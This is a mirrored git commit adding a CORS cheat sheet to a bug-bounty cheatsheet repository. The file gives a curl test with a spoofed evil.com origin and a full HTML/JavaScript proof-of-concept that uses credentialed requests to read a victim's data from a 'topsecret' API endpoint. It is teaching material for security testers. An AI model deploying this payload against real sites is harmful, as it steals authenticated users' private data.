mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-24 20:13:06 +00:00
Create cors.md
We should create a CORS cheatsheet. Will add more in the future.
This commit is contained in:
parent
9ceb1b7053
commit
a208ba5d18
1 changed files with 36 additions and 0 deletions
36
cheatsheets/cors.md
Normal file
36
cheatsheets/cors.md
Normal file
|
@ -0,0 +1,36 @@
|
||||||
|
## Cross Origin Resource Sharing (CORS)
|
||||||
|
|
||||||
|
Testing:
|
||||||
|
`curl --head -s 'http://example.com/api/v1/secret' -H 'Origin: http://evil.com'`
|
||||||
|
|
||||||
|
Check to see what the server responds with in the `Access-Control-Allow-Origin:` (if anything) and if so, check if `Access-Control-Allow-Credentials: true` is present.
|
||||||
|
|
||||||
|
If it is trusting arbitrary origins **with** allow-credentials set to true, then host this HTML as a proof of concept.
|
||||||
|
|
||||||
|
```
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
<head><title>BugBounty CheatSheet</title></head>
|
||||||
|
<body>
|
||||||
|
<center>
|
||||||
|
<h2>CORs POC</h2>
|
||||||
|
|
||||||
|
<textarea rows="10" cols="60" id="pwnz">
|
||||||
|
</textarea><br>
|
||||||
|
<button type="button" onclick="cors()">Exploit</button>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<script>
|
||||||
|
function cors() {
|
||||||
|
var xhttp = new XMLHttpRequest();
|
||||||
|
xhttp.onreadystatechange = function() {
|
||||||
|
if (this.readyState == 4 && this.status == 200) {
|
||||||
|
document.getElementById("pwnz").innerHTML = this.responseText;
|
||||||
|
}
|
||||||
|
};
|
||||||
|
xhttp.open("GET", "http://example.com/api/v1/topsecret", true);
|
||||||
|
xhttp.withCredentials = true;
|
||||||
|
xhttp.send();
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
```
|
Loading…
Reference in a new issue